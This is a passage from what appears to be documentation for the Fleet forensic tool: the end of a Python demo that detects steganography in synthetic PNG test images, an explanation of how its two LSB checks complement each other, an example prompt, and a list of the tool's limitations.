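APPENDED_PNG = CLEAN_PNG + b"PK\x03\x04" + b"\0" * 40                                     # zip-like trailer

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PNG), ("text", TEXT_STEGO_PNG),
                       ("random", RANDOM_STEGO_PNG), ("appended", APPENDED_PNG)):
        print(label, analyze_image(img)["findings"])
```

The two LSB indicators are complementary, which is the practical lesson: the text payload is invisible to the compressibility check (text compresses) but falls straight out of the extraction attempt, while the random payload decodes to nothing readable but is obvious from the blocks that will not compress. A photograph with sensor noise makes the compressibility check fire on its own, so on real images the per-block ratios are compared against blocks elsewhere in the same picture rather than against a fixed threshold.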
Example prompt:
Analyze the attached image for steganographic content. Try all detection methods and report confidence levels.
Limitations
- All forensic analysis runs within Fleet’s isolated environment. Fleet cannot directly scan live systems or endpoints.
- Memory forensics requires a compatible memory dump format. Raw memory dumps produce the best results.
- Password cracking is limited to dictionary-based and pattern-based approaches. Complex passwords may not be recoverable.
- Steganography detection is probabilistic. Not all steganographic methods can be detected, and false positives are possible.